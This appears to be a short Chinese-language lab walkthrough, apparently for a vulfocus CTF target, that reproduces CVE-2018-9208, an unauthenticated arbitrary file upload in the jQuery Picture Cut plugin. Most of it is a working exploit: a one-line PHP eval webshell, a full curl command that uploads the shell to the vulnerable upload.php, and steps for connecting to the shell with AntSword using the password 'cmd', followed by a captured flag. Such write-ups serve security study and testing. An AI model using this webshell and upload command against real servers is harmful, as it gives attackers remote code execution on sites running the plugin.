jquery-picture-cut 任意文件上传(CVE-2018-9208)
漏洞描述
picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。
漏洞影响
jQuery Picture Cut <= v1.1
注意:vulfocus靶场中的网站安装路径为jquery-picture-cut/src/php/upload.php
漏洞复现
准备一个一句话木马,shell.php
<?php @eval($_POST['cmd']);?>
使用curl在当前一句话木马目录中上传webshell,虽然显示了一些错误,但是实际是成功上传了
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://x.x.x.x/jquery-picture-cut/src/php/upload.php
使用蚁剑连接webshell,密码为cmd
http://x.x.x.x/shell.php
flag-{bmh7616f868-bc3a-4f28-9407-ef4c15a4eb3e}